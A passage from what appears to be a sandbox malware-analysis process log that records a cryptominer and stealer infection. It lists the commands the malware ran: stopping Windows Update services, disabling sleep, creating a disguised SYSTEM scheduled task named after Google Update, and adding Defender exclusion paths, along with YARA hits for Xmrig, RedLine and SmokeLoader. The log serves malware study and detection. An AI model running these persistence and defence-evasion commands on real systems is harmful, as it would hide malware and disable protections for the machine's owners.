                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:22
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop bits
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:23
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop dosvc
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:24
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                                            Imagebase:0x7ff7f6ec0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:25
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:26
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:27
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:28
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:29
                                                                                                                                                            Start time:15:35:09
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:30
                                                                                                                                                            Start time:15:35:09
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:31
                                                                                                                                                            Start time:15:35:09
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:33
                                                                                                                                                            Start time:15:35:15
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -nologo -noprofile
                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:34
                                                                                                                                                            Start time:15:35:15
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:37
                                                                                                                                                            Start time:15:35:31
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                                            Imagebase:0x7ff72fde0000
                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:38
                                                                                                                                                            Start time:15:35:31
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7934f0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:39
                                                                                                                                                            Start time:15:35:31
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                            Imagebase:0x7ff7fa990000
                                                                                                                                                            File size:5'874'968 bytes
                                                                                                                                                            MD5 hash:BAE29E49E8190BFBBF0D77FFAB8DE59D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, Author: unknown
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 71%, ReversingLabs
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:40
                                                                                                                                                            Start time:15:35:31
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:41
                                                                                                                                                            Start time:15:35:31
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:42
                                                                                                                                                            Start time:15:35:33
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                            Imagebase:0x7ff7f6ec0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:43
                                                                                                                                                            Start time:15:35:33
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:44
                                                                                                                                                            Start time:15:35:33
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop UsoSvc
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:45
                                                                                                                                                            Start time:15:35:33
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop WaaSMedicSvc
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:47
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop wuauserv
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:48
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop bits
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:49
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop dosvc
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:50
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                                            Imagebase:0x7ff7f6ec0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:51
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:52
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:53
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:54
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:55
                                                                                                                                                            Start time:15:35:34
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -hibernate-timeout-dc 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:56
                                                                                                                                                            Start time:15:35:35
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:57
                                                                                                                                                            Start time:15:35:35
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\cdttvvc
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\cdttvvc
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:270'848 bytes
                                                                                                                                                            MD5 hash:DCBD05276D11111F2DD2A7EDF52E3386
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000039.00000002.2540236474.0000000000A82000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 34%, ReversingLabs
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:58
                                                                                                                                                            Start time:15:35:35
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                                                                            Imagebase:0x7ff68ea30000
                                                                                                                                                            File size:96'256 bytes
                                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:59
                                                                                                                                                            Start time:15:35:41
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\cdttvvc
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\cdttvvc
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:270'848 bytes
                                                                                                                                                            MD5 hash:DCBD05276D11111F2DD2A7EDF52E3386
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000003B.00000002.2612331641.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:60
                                                                                                                                                            Start time:15:35:55
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\conhost.exe
                                                                                                                                                            Imagebase:0x7ff7403e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:61
                                                                                                                                                            Start time:15:35:55
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:62
                                                                                                                                                            Start time:15:35:55
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:63
                                                                                                                                                            Start time:15:35:56
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                            Imagebase:0x7ff609140000
                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4558997865.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708781420.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708852084.0000000001958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2684879397.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4558997865.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708747670.0000000001975000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
